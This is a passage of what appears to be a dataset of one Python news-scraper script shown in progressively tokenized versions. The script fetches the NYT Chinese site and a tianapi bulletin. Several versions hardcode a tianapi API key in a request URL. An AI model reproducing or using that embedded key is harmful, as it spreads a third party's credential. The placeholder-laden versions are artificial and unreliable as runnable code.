'【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1\n ] + '\\n' + morning_news()\n return news_spider_message\n\n\nheaders = {'User-Agent':\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'\n }\n\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society, headers=headers)\n mytree = lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n news = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath(\n '//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n newss_1 = ''\n number = 1\n for t in title:\n newss = str(number) + ':' + str_list(t.text\n ) + '。' + '\\n' + ' 概要:' + str_list(news[title.index(t)].text\n ) + '。' + '\\n' + ' 详情:' + '\\n' + '\\n'\n newss_1 += newss\n number += 1\n return newss_1\n\n\ndef NewYork_news_put(page=0):\n news_spider_message = '【纽约时报中文网】' + china_lunar()[0] + ' ' + china_lunar()[\n 1] + '\\n' + NewYork_news(page)\n return news_spider_message\n\n\ndef str_list(t):\n m = ''\n for i in list(t):\n if i == '中':\n china = 'Z'\n m += china + '_'\n else:\n m += i + '_'\n return m\n", "<import token>\n<assignment token>\n\n\ndef china_lunar():\n today = str(date.today())\n today_list = today.split('-')\n lunar_day = lunar.getDayBySolar(int(datetime.datetime.now().year), int(\n datetime.datetime.now().month), int(datetime.datetime.now().day))\n if lunar_day.Lleap:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n else:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n return today, china_day\n\n\n<import token>\n\n\ndef morning_news():\n news_api = (\n 'http://api.tianapi.com/bulletin/index?key=7d407997897033ce7f6e86a51e3284d2'\n )\n response = requests.get(news_api)\n print(dict(response.json()))\n news_list = dict(response.json())\n news = ''\n m = 1\n news_q = ''\n for i in news_list['newslist']:\n img_url = ''\n if i['url'] == '':\n img_url = i['imgsrc']\n news = str(str(m) + ':' + i['title'] + '\\n' + i['url'] + img_url + '\\n'\n )\n news_q += str(news)\n m += 1\n return news_q\n\n\ndef news_put():\n news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1\n ] + '\\n' + morning_news()\n return news_spider_message\n\n\n<assignment token>\n\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society, headers=headers)\n mytree = lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n news = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath(\n '//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n newss_1 = ''\n number = 1\n for t in title:\n newss = str(number) + ':' + str_list(t.text\n ) + '。' + '\\n' + ' 概要:' + str_list(news[title.index(t)].text\n ) + '。' + '\\n' + ' 详情:' + '\\n' + '\\n'\n newss_1 += newss\n number += 1\n return newss_1\n\n\ndef NewYork_news_put(page=0):\n news_spider_message = '【纽约时报中文网】' + china_lunar()[0] + ' ' + china_lunar()[\n 1] + '\\n' + NewYork_news(page)\n return news_spider_message\n\n\ndef str_list(t):\n m = ''\n for i in list(t):\n if i == '中':\n china = 'Z'\n m += china + '_'\n else:\n m += i + '_'\n return m\n", "<import token>\n<assignment token>\n\n\ndef china_lunar():\n today = str(date.today())\n today_list = today.split('-')\n lunar_day = 
lunar.getDayBySolar(int(datetime.datetime.now().year), int(\n datetime.datetime.now().month), int(datetime.datetime.now().day))\n if lunar_day.Lleap:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n else:\n china_day = '农历:{0}月{1}'.format(ymc[lunar_day.Lmc], rmc[lunar_day.Ldi])\n return today, china_day\n\n\n<import token>\n<function token>\n\n\ndef news_put():\n news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1\n ] + '\\n' + morning_news()\n return news_spider_message\n\n\n<assignment token>\n\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society, headers=headers)\n mytree = lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n news = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath(\n '//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n newss_1 = ''\n number = 1\n for t in title:\n newss = str(number) + ':' + str_list(t.text\n ) + '。' + '\\n' + ' 概要:' + str_list(news[title.index(t)].text\n ) + '。' + '\\n' + ' 详情:' + '\\n' + '\\n'\n newss_1 += newss\n number += 1\n return newss_1\n\n\ndef NewYork_news_put(page=0):\n news_spider_message = '【纽约时报中文网】' + china_lunar()[0] + ' ' + china_lunar()[\n 1] + '\\n' + NewYork_news(page)\n return news_spider_message\n\n\ndef str_list(t):\n m = ''\n for i in list(t):\n if i == '中':\n china = 'Z'\n m += china + '_'\n else:\n m += i + '_'\n return m\n", "<import token>\n<assignment token>\n<function token>\n<import token>\n<function token>\n\n\ndef news_put():\n news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1\n ] + '\\n' + morning_news()\n return news_spider_message\n\n\n<assignment token>\n\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society, headers=headers)\n mytree = lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n news = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath(\n '//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n newss_1 = ''\n number = 1\n for t in title:\n newss = str(number) + ':' + str_list(t.text\n ) + '。' + '\\n' + ' 概要:' + str_list(news[title.index(t)].text\n ) + '。' + '\\n' + ' 详情:' + '\\n' + '\\n'\n newss_1 += newss\n number += 1\n return newss_1\n\n\ndef NewYork_news_put(page=0):\n news_spider_message = '【纽约时报中文网】' + china_lunar()[0] + ' ' + china_lunar()[\n 1] + '\\n' + NewYork_news(page)\n return news_spider_message\n\n\ndef str_list(t):\n m = ''\n for i in list(t):\n if i == '中':\n china = 'Z'\n m += china + '_'\n else:\n m += i + '_'\n return m\n", "<import token>\n<assignment token>\n<function token>\n<import token>\n<function token>\n\n\ndef news_put():\n news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1\n ] + '\\n' + morning_news()\n return news_spider_message\n\n\n<assignment token>\n\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society, headers=headers)\n mytree = lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n news = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath(\n '//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n newss_1 = ''\n number = 1\n for t in title:\n newss = 
str(number) + ':' + str_list(t.text\n ) + '。' + '\\n' + ' 概要:' + str_list(news[title.index(t)].text\n ) + '。' + '\\n' + ' 详情:' + '\\n' + '\\n'\n newss_1 += newss\n number += 1\n return newss_1\n\n\ndef NewYork_news_put(page=0):\n news_spider_message = '【纽约时报中文网】' + china_lunar()[0] + ' ' + china_lunar()[\n 1] + '\\n' + NewYork_news(page)\n return news_spider_message\n\n\n<function token>\n", "<import token>\n<assignment token>\n<function token>\n<import token>\n<function token>\n\n\ndef news_put():\n news_spider_message = '【早间新闻】 ' + china_lunar()[0] + ' ' + china_lunar()[1\n ] + '\\n' + morning_news()\n return news_spider_message\n\n\n<assignment token>\n\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society, headers=headers)\n mytree = lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n news = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath(\n '//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n newss_1 = ''\n number = 1\n for t in title:\n newss = str(number) + ':' + str_list(t.text\n ) + '。' + '\\n' + ' 概要:' + str_list(news[title.index(t)].text\n ) + '。' + '\\n' + ' 详情:' + '\\n' + '\\n'\n newss_1 += newss\n number += 1\n return newss_1\n\n\n<function token>\n<function token>\n", "<import token>\n<assignment token>\n<function token>\n<import token>\n<function token>\n<function token>\n<assignment token>\n\n\ndef NewYork_news(page=1):\n society = 'https://cn.nytimes.com/society/{}/'.format(page)\n response = requests.get(url=society, headers=headers)\n mytree = lxml.etree.HTML(response.text)\n title = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a')\n news = mytree.xpath('//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//p')\n url = mytree.xpath(\n '//*[@id=\"sectionWrapper\"]/div[1]/div/div/ul//h3/a/@href')\n newss_1 = ''\n number = 1\n for t in title:\n newss = str(number) + ':' + str_list(t.text\n ) + '。' + '\\n' + ' 概要:' + str_list(news[title.index(t)].text\n ) + '。' + '\\n' + ' 详情:' + '\\n' + '\\n'\n newss_1 += newss\n number += 1\n return newss_1\n\n\n<function token>\n<function token>\n", "<import token>\n<assignment token>\n<function token>\n<import token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n" ]
false
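In entry 50's `NewYork_news`, each summary is looked up with `news[title.index(t)]`; `list.index` returns the first match, so two identical headlines would both receive the first one's summary. Pairing by position is the idiomatic fix. A hypothetical helper sketching that (the name `format_news` is invented; the record itself iterates lxml elements and reads `.text`, while this standalone sketch takes plain strings):

def format_news(titles, summaries):
    # zip + enumerate pairs items positionally, immune to duplicate titles.
    lines = []
    for number, (title, summary) in enumerate(zip(titles, summaries), start=1):
        lines.append('{}:{}。\n 概要:{}。\n 详情:\n'.format(number, title, summary))
    return '\n'.join(lines)

print(format_news(['标题一', '标题二'], ['概要一', '概要二']))

Note also that the record hard-codes its tianapi key inside `news_api`; in practice that credential would normally live in configuration rather than in source.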
51
2c39660da8fe839c4634cd73ce069acc7b1b29b4
import time # Decorator def measure_time_of_func(func): def wrapper_func(n): start_time = time.time() fib_seq = func(n) end_time = time.time() return (fib_seq, end_time - start_time) return wrapper_func # Returns a list with first n numbers of fibonacci sequence. @measure_time_of_func def fib(n): sequence = [1, 1] for i in range(2, n, 1): sequence.append(sequence[i - 1] + sequence[i - 2]) return sequence
[ "import time\n\n\n# Decorator\ndef measure_time_of_func(func):\n def wrapper_func(n):\n start_time = time.time()\n fib_seq = func(n)\n end_time = time.time()\n return (fib_seq, end_time - start_time)\n\n return wrapper_func\n\n\n# Returns a list with first n numbers of fibonacci sequence.\n@measure_time_of_func\ndef fib(n):\n sequence = [1, 1]\n for i in range(2, n, 1):\n sequence.append(sequence[i - 1] + sequence[i - 2])\n return sequence\n", "import time\n\n\ndef measure_time_of_func(func):\n\n def wrapper_func(n):\n start_time = time.time()\n fib_seq = func(n)\n end_time = time.time()\n return fib_seq, end_time - start_time\n return wrapper_func\n\n\n@measure_time_of_func\ndef fib(n):\n sequence = [1, 1]\n for i in range(2, n, 1):\n sequence.append(sequence[i - 1] + sequence[i - 2])\n return sequence\n", "<import token>\n\n\ndef measure_time_of_func(func):\n\n def wrapper_func(n):\n start_time = time.time()\n fib_seq = func(n)\n end_time = time.time()\n return fib_seq, end_time - start_time\n return wrapper_func\n\n\n@measure_time_of_func\ndef fib(n):\n sequence = [1, 1]\n for i in range(2, n, 1):\n sequence.append(sequence[i - 1] + sequence[i - 2])\n return sequence\n", "<import token>\n<function token>\n\n\n@measure_time_of_func\ndef fib(n):\n sequence = [1, 1]\n for i in range(2, n, 1):\n sequence.append(sequence[i - 1] + sequence[i - 2])\n return sequence\n", "<import token>\n<function token>\n<function token>\n" ]
false
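`measure_time_of_func` in entry 51 returns a `(result, elapsed_seconds)` tuple, so the decorated `fib` no longer yields a bare list and callers unpack two values. A small usage sketch (the timing value is illustrative and varies per run):

seq, elapsed = fib(10)
print(seq)      # [1, 1, 2, 3, 5, 8, 13, 21, 34, 55]
print(elapsed)  # wall-clock seconds as a float, typically on the order of 1e-06

Because `wrapper_func` accepts exactly one positional argument, the decorator as written only fits single-argument functions; a `*args, **kwargs` signature would generalise it.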
52
c87e6f8780bf8d9097f200c7f2f0faf55beb480c
# 1 def transform_data(fn): print(fn(10)) # 2 transform_data(lambda data: data / 5) # 3 def transform_data2(fn, *args): for arg in args: print(fn(arg)) transform_data2(lambda data: data / 5, 10, 15, 22, 30) # 4 def transform_data2(fn, *args): for arg in args: print('Result: {:^20.2f}'.format(fn(arg))) transform_data2(lambda data: data / 5, 10, 15, 22, 30)
[ "# 1\r\ndef transform_data(fn):\r\n print(fn(10))\r\n\r\n# 2\r\ntransform_data(lambda data: data / 5)\r\n\r\n# 3\r\ndef transform_data2(fn, *args):\r\n for arg in args:\r\n print(fn(arg))\r\n\r\ntransform_data2(lambda data: data / 5, 10, 15, 22, 30)\r\n\r\n# 4\r\ndef transform_data2(fn, *args):\r\n for arg in args:\r\n print('Result: {:^20.2f}'.format(fn(arg)))\r\n\r\ntransform_data2(lambda data: data / 5, 10, 15, 22, 30)", "def transform_data(fn):\n print(fn(10))\n\n\ntransform_data(lambda data: data / 5)\n\n\ndef transform_data2(fn, *args):\n for arg in args:\n print(fn(arg))\n\n\ntransform_data2(lambda data: data / 5, 10, 15, 22, 30)\n\n\ndef transform_data2(fn, *args):\n for arg in args:\n print('Result: {:^20.2f}'.format(fn(arg)))\n\n\ntransform_data2(lambda data: data / 5, 10, 15, 22, 30)\n", "def transform_data(fn):\n print(fn(10))\n\n\n<code token>\n\n\ndef transform_data2(fn, *args):\n for arg in args:\n print(fn(arg))\n\n\n<code token>\n\n\ndef transform_data2(fn, *args):\n for arg in args:\n print('Result: {:^20.2f}'.format(fn(arg)))\n\n\n<code token>\n", "def transform_data(fn):\n print(fn(10))\n\n\n<code token>\n\n\ndef transform_data2(fn, *args):\n for arg in args:\n print(fn(arg))\n\n\n<code token>\n<function token>\n<code token>\n", "def transform_data(fn):\n print(fn(10))\n\n\n<code token>\n<function token>\n<code token>\n<function token>\n<code token>\n", "<function token>\n<code token>\n<function token>\n<code token>\n<function token>\n<code token>\n" ]
false
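Entry 52 defines `transform_data2` twice; the second definition shadows the first at module scope, so after the file runs only the `'Result: {:^20.2f}'` variant remains bound. That format spec centres the value, rounded to two decimals, inside a 20-character field:

print('Result: {:^20.2f}'.format(10 / 5))
# prints 'Result:' followed by 2.00 centred in a 20-character field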
53
f4f08015b7638f4d6ea793350d5d19a3485978cd
"""Plot the output data. """ # Standard library import os import json import math import matplotlib as maplot import matplotlib.pyplot as pyplot from datetime import datetime # User library from sub.inputprocess import CONSTANTS as CONS # **json.loads(json_data) def get_data(): """Read output file to get data.""" try: with open(CONS["OUTPUT_FILE"], "r") as file: data = json.load(file)[1] return data except FileNotFoundError: print("Data file not found.") exit() def get_objectives(data): """Get a list of all first chromosomes' objective values.""" objectives = [math.log(population[0]["objective"]) for population in data] # objectives = [population[0]["objective"] for population in data] return objectives def get_new_values(values): """Record any changes higher. Its size is the same as its argument's.""" new_values = [] new_value = values[0] for value in values: if value > new_value: new_value = value new_values.append(new_value) return new_values def main(values, is_animation=False): """Main function to show the plot which could be played with animation.""" def on_clicked(event): """Direct the program when a key is pressed.""" if event.key == "x": # Use this os._exit(0) to close whole window, even when playing os._exit(0) if event.key == "s": # Get time to define image's name now = datetime.now() current_time = now.strftime("%H-%M-%S") plot_name = "Plot" + "-" + current_time # Remove left title, then save image pyplot.title("", loc="left", pad=20) fig.savefig( "%s%s%s" % ( CONS["OUTPUT_PHOTO_DIRECTORY"], plot_name, CONS["PHOTO_TYPE"], ), transparent=False, dpi=300, ) # Use this exit(0) to prevent exiting when playing the plot # but allow closing when plotting finishes exit(0) def draw(values): """Plot the grid, the line graphs and the titles.""" # Turn on grid with dashed style subplot.yaxis.grid(True, linestyle="dashed") # Get list of new higher values new_values = get_new_values(values) # Plot 2 lines subplot.plot(range(len(values)), values) subplot.plot(range(len(new_values)), new_values, linewidth=2) # Print left plot title pyplot.title( "Press X to exit\nPress S to save", loc="left", fontsize=14, color="#1F76B4", style="italic", pad=20, ) # Print right plot title pyplot.title( f"{'Max objective:':>25}{max(values):>10.2E}\n" f"{'Generation:':>25}{values.index(max(values)):>10}", loc="right", fontfamily="Lucida Sans Typewriter", fontsize=12, color="#FF7E0E", pad=20, ) # The following code configures some elements of the plot window # Disable toolbar maplot.rcParams["toolbar"] = "None" # Set font maplot.rcParams["font.family"] = "Candara" maplot.rcParams["font.size"] = 12 maplot.rcParams["font.weight"] = 500 # Set window title fig = pyplot.figure(figsize=(10, 5)) fig.canvas.set_window_title("Prosthetic Foot Design by Genetic Algorithm") # Set icon manager = pyplot.get_current_fig_manager() manager.window.wm_iconbitmap(CONS["ICON_FILE"]) # Disable some borders subplot = fig.add_subplot(111, frameon=True) subplot.spines["right"].set_visible(False) subplot.spines["left"].set_visible(False) subplot.spines["top"].set_visible(False) # Push verticle axis to the right subplot.yaxis.tick_right() # Padding axis label from plot area, maybe unnecessary subplot.tick_params(axis="y", which="major", pad=5) subplot.tick_params(axis="x", which="major", pad=5) # Adjust subplot size based on window size pyplot.subplots_adjust(left=0.03, right=0.94, top=0.82, bottom=0.1) # Reconize key pressed pyplot.connect("key_press_event", on_clicked) if is_animation: for index in range(1, len(values) + 1): 
subplot.clear() draw(values[:index]) pyplot.pause(0.0001) else: draw(values) # Hold window pyplot.show() if __name__ == "__main__": __package__ = "inputprocess" objectives = get_objectives(get_data()) main(objectives, is_animation=CONS["IS_ANIMATION"])
[ "\"\"\"Plot the output data.\n\"\"\"\n\n# Standard library\nimport os\nimport json\nimport math\nimport matplotlib as maplot\nimport matplotlib.pyplot as pyplot\nfrom datetime import datetime\n\n# User library\nfrom sub.inputprocess import CONSTANTS as CONS\n\n\n# **json.loads(json_data)\ndef get_data():\n \"\"\"Read output file to get data.\"\"\"\n try:\n with open(CONS[\"OUTPUT_FILE\"], \"r\") as file:\n data = json.load(file)[1]\n return data\n except FileNotFoundError:\n print(\"Data file not found.\")\n exit()\n\n\ndef get_objectives(data):\n \"\"\"Get a list of all first chromosomes' objective values.\"\"\"\n objectives = [math.log(population[0][\"objective\"]) for population in data]\n # objectives = [population[0][\"objective\"] for population in data]\n return objectives\n\n\ndef get_new_values(values):\n \"\"\"Record any changes higher. Its size is the same as its argument's.\"\"\"\n new_values = []\n new_value = values[0]\n for value in values:\n if value > new_value:\n new_value = value\n new_values.append(new_value)\n return new_values\n\n\ndef main(values, is_animation=False):\n \"\"\"Main function to show the plot which could be played with animation.\"\"\"\n\n def on_clicked(event):\n \"\"\"Direct the program when a key is pressed.\"\"\"\n\n if event.key == \"x\":\n # Use this os._exit(0) to close whole window, even when playing\n os._exit(0)\n\n if event.key == \"s\":\n # Get time to define image's name\n now = datetime.now()\n current_time = now.strftime(\"%H-%M-%S\")\n plot_name = \"Plot\" + \"-\" + current_time\n\n # Remove left title, then save image\n pyplot.title(\"\", loc=\"left\", pad=20)\n fig.savefig(\n \"%s%s%s\"\n % (\n CONS[\"OUTPUT_PHOTO_DIRECTORY\"],\n plot_name,\n CONS[\"PHOTO_TYPE\"],\n ),\n transparent=False,\n dpi=300,\n )\n\n # Use this exit(0) to prevent exiting when playing the plot\n # but allow closing when plotting finishes\n exit(0)\n\n def draw(values):\n \"\"\"Plot the grid, the line graphs and the titles.\"\"\"\n\n # Turn on grid with dashed style\n subplot.yaxis.grid(True, linestyle=\"dashed\")\n\n # Get list of new higher values\n new_values = get_new_values(values)\n\n # Plot 2 lines\n subplot.plot(range(len(values)), values)\n subplot.plot(range(len(new_values)), new_values, linewidth=2)\n\n # Print left plot title\n pyplot.title(\n \"Press X to exit\\nPress S to save\",\n loc=\"left\",\n fontsize=14,\n color=\"#1F76B4\",\n style=\"italic\",\n pad=20,\n )\n\n # Print right plot title\n pyplot.title(\n f\"{'Max objective:':>25}{max(values):>10.2E}\\n\"\n f\"{'Generation:':>25}{values.index(max(values)):>10}\",\n loc=\"right\",\n fontfamily=\"Lucida Sans Typewriter\",\n fontsize=12,\n color=\"#FF7E0E\",\n pad=20,\n )\n\n # The following code configures some elements of the plot window\n\n # Disable toolbar\n maplot.rcParams[\"toolbar\"] = \"None\"\n\n # Set font\n maplot.rcParams[\"font.family\"] = \"Candara\"\n maplot.rcParams[\"font.size\"] = 12\n maplot.rcParams[\"font.weight\"] = 500\n\n # Set window title\n fig = pyplot.figure(figsize=(10, 5))\n fig.canvas.set_window_title(\"Prosthetic Foot Design by Genetic Algorithm\")\n\n # Set icon\n manager = pyplot.get_current_fig_manager()\n manager.window.wm_iconbitmap(CONS[\"ICON_FILE\"])\n\n # Disable some borders\n subplot = fig.add_subplot(111, frameon=True)\n subplot.spines[\"right\"].set_visible(False)\n subplot.spines[\"left\"].set_visible(False)\n subplot.spines[\"top\"].set_visible(False)\n\n # Push verticle axis to the right\n subplot.yaxis.tick_right()\n\n # Padding axis label from 
plot area, maybe unnecessary\n subplot.tick_params(axis=\"y\", which=\"major\", pad=5)\n subplot.tick_params(axis=\"x\", which=\"major\", pad=5)\n\n # Adjust subplot size based on window size\n pyplot.subplots_adjust(left=0.03, right=0.94, top=0.82, bottom=0.1)\n\n # Reconize key pressed\n pyplot.connect(\"key_press_event\", on_clicked)\n\n if is_animation:\n for index in range(1, len(values) + 1):\n subplot.clear()\n draw(values[:index])\n pyplot.pause(0.0001)\n else:\n draw(values)\n\n # Hold window\n pyplot.show()\n\n\nif __name__ == \"__main__\":\n __package__ = \"inputprocess\"\n objectives = get_objectives(get_data())\n main(objectives, is_animation=CONS[\"IS_ANIMATION\"])\n", "<docstring token>\nimport os\nimport json\nimport math\nimport matplotlib as maplot\nimport matplotlib.pyplot as pyplot\nfrom datetime import datetime\nfrom sub.inputprocess import CONSTANTS as CONS\n\n\ndef get_data():\n \"\"\"Read output file to get data.\"\"\"\n try:\n with open(CONS['OUTPUT_FILE'], 'r') as file:\n data = json.load(file)[1]\n return data\n except FileNotFoundError:\n print('Data file not found.')\n exit()\n\n\ndef get_objectives(data):\n \"\"\"Get a list of all first chromosomes' objective values.\"\"\"\n objectives = [math.log(population[0]['objective']) for population in data]\n return objectives\n\n\ndef get_new_values(values):\n \"\"\"Record any changes higher. Its size is the same as its argument's.\"\"\"\n new_values = []\n new_value = values[0]\n for value in values:\n if value > new_value:\n new_value = value\n new_values.append(new_value)\n return new_values\n\n\ndef main(values, is_animation=False):\n \"\"\"Main function to show the plot which could be played with animation.\"\"\"\n\n def on_clicked(event):\n \"\"\"Direct the program when a key is pressed.\"\"\"\n if event.key == 'x':\n os._exit(0)\n if event.key == 's':\n now = datetime.now()\n current_time = now.strftime('%H-%M-%S')\n plot_name = 'Plot' + '-' + current_time\n pyplot.title('', loc='left', pad=20)\n fig.savefig('%s%s%s' % (CONS['OUTPUT_PHOTO_DIRECTORY'],\n plot_name, CONS['PHOTO_TYPE']), transparent=False, dpi=300)\n exit(0)\n\n def draw(values):\n \"\"\"Plot the grid, the line graphs and the titles.\"\"\"\n subplot.yaxis.grid(True, linestyle='dashed')\n new_values = get_new_values(values)\n subplot.plot(range(len(values)), values)\n subplot.plot(range(len(new_values)), new_values, linewidth=2)\n pyplot.title('Press X to exit\\nPress S to save', loc='left',\n fontsize=14, color='#1F76B4', style='italic', pad=20)\n pyplot.title(\n f\"\"\"{'Max objective:':>25}{max(values):>10.2E}\n{'Generation:':>25}{values.index(max(values)):>10}\"\"\"\n , loc='right', fontfamily='Lucida Sans Typewriter', fontsize=12,\n color='#FF7E0E', pad=20)\n maplot.rcParams['toolbar'] = 'None'\n maplot.rcParams['font.family'] = 'Candara'\n maplot.rcParams['font.size'] = 12\n maplot.rcParams['font.weight'] = 500\n fig = pyplot.figure(figsize=(10, 5))\n fig.canvas.set_window_title('Prosthetic Foot Design by Genetic Algorithm')\n manager = pyplot.get_current_fig_manager()\n manager.window.wm_iconbitmap(CONS['ICON_FILE'])\n subplot = fig.add_subplot(111, frameon=True)\n subplot.spines['right'].set_visible(False)\n subplot.spines['left'].set_visible(False)\n subplot.spines['top'].set_visible(False)\n subplot.yaxis.tick_right()\n subplot.tick_params(axis='y', which='major', pad=5)\n subplot.tick_params(axis='x', which='major', pad=5)\n pyplot.subplots_adjust(left=0.03, right=0.94, top=0.82, bottom=0.1)\n pyplot.connect('key_press_event', 
on_clicked)\n if is_animation:\n for index in range(1, len(values) + 1):\n subplot.clear()\n draw(values[:index])\n pyplot.pause(0.0001)\n else:\n draw(values)\n pyplot.show()\n\n\nif __name__ == '__main__':\n __package__ = 'inputprocess'\n objectives = get_objectives(get_data())\n main(objectives, is_animation=CONS['IS_ANIMATION'])\n", "<docstring token>\n<import token>\n\n\ndef get_data():\n \"\"\"Read output file to get data.\"\"\"\n try:\n with open(CONS['OUTPUT_FILE'], 'r') as file:\n data = json.load(file)[1]\n return data\n except FileNotFoundError:\n print('Data file not found.')\n exit()\n\n\ndef get_objectives(data):\n \"\"\"Get a list of all first chromosomes' objective values.\"\"\"\n objectives = [math.log(population[0]['objective']) for population in data]\n return objectives\n\n\ndef get_new_values(values):\n \"\"\"Record any changes higher. Its size is the same as its argument's.\"\"\"\n new_values = []\n new_value = values[0]\n for value in values:\n if value > new_value:\n new_value = value\n new_values.append(new_value)\n return new_values\n\n\ndef main(values, is_animation=False):\n \"\"\"Main function to show the plot which could be played with animation.\"\"\"\n\n def on_clicked(event):\n \"\"\"Direct the program when a key is pressed.\"\"\"\n if event.key == 'x':\n os._exit(0)\n if event.key == 's':\n now = datetime.now()\n current_time = now.strftime('%H-%M-%S')\n plot_name = 'Plot' + '-' + current_time\n pyplot.title('', loc='left', pad=20)\n fig.savefig('%s%s%s' % (CONS['OUTPUT_PHOTO_DIRECTORY'],\n plot_name, CONS['PHOTO_TYPE']), transparent=False, dpi=300)\n exit(0)\n\n def draw(values):\n \"\"\"Plot the grid, the line graphs and the titles.\"\"\"\n subplot.yaxis.grid(True, linestyle='dashed')\n new_values = get_new_values(values)\n subplot.plot(range(len(values)), values)\n subplot.plot(range(len(new_values)), new_values, linewidth=2)\n pyplot.title('Press X to exit\\nPress S to save', loc='left',\n fontsize=14, color='#1F76B4', style='italic', pad=20)\n pyplot.title(\n f\"\"\"{'Max objective:':>25}{max(values):>10.2E}\n{'Generation:':>25}{values.index(max(values)):>10}\"\"\"\n , loc='right', fontfamily='Lucida Sans Typewriter', fontsize=12,\n color='#FF7E0E', pad=20)\n maplot.rcParams['toolbar'] = 'None'\n maplot.rcParams['font.family'] = 'Candara'\n maplot.rcParams['font.size'] = 12\n maplot.rcParams['font.weight'] = 500\n fig = pyplot.figure(figsize=(10, 5))\n fig.canvas.set_window_title('Prosthetic Foot Design by Genetic Algorithm')\n manager = pyplot.get_current_fig_manager()\n manager.window.wm_iconbitmap(CONS['ICON_FILE'])\n subplot = fig.add_subplot(111, frameon=True)\n subplot.spines['right'].set_visible(False)\n subplot.spines['left'].set_visible(False)\n subplot.spines['top'].set_visible(False)\n subplot.yaxis.tick_right()\n subplot.tick_params(axis='y', which='major', pad=5)\n subplot.tick_params(axis='x', which='major', pad=5)\n pyplot.subplots_adjust(left=0.03, right=0.94, top=0.82, bottom=0.1)\n pyplot.connect('key_press_event', on_clicked)\n if is_animation:\n for index in range(1, len(values) + 1):\n subplot.clear()\n draw(values[:index])\n pyplot.pause(0.0001)\n else:\n draw(values)\n pyplot.show()\n\n\nif __name__ == '__main__':\n __package__ = 'inputprocess'\n objectives = get_objectives(get_data())\n main(objectives, is_animation=CONS['IS_ANIMATION'])\n", "<docstring token>\n<import token>\n\n\ndef get_data():\n \"\"\"Read output file to get data.\"\"\"\n try:\n with open(CONS['OUTPUT_FILE'], 'r') as file:\n data = json.load(file)[1]\n 
return data\n except FileNotFoundError:\n print('Data file not found.')\n exit()\n\n\ndef get_objectives(data):\n \"\"\"Get a list of all first chromosomes' objective values.\"\"\"\n objectives = [math.log(population[0]['objective']) for population in data]\n return objectives\n\n\ndef get_new_values(values):\n \"\"\"Record any changes higher. Its size is the same as its argument's.\"\"\"\n new_values = []\n new_value = values[0]\n for value in values:\n if value > new_value:\n new_value = value\n new_values.append(new_value)\n return new_values\n\n\ndef main(values, is_animation=False):\n \"\"\"Main function to show the plot which could be played with animation.\"\"\"\n\n def on_clicked(event):\n \"\"\"Direct the program when a key is pressed.\"\"\"\n if event.key == 'x':\n os._exit(0)\n if event.key == 's':\n now = datetime.now()\n current_time = now.strftime('%H-%M-%S')\n plot_name = 'Plot' + '-' + current_time\n pyplot.title('', loc='left', pad=20)\n fig.savefig('%s%s%s' % (CONS['OUTPUT_PHOTO_DIRECTORY'],\n plot_name, CONS['PHOTO_TYPE']), transparent=False, dpi=300)\n exit(0)\n\n def draw(values):\n \"\"\"Plot the grid, the line graphs and the titles.\"\"\"\n subplot.yaxis.grid(True, linestyle='dashed')\n new_values = get_new_values(values)\n subplot.plot(range(len(values)), values)\n subplot.plot(range(len(new_values)), new_values, linewidth=2)\n pyplot.title('Press X to exit\\nPress S to save', 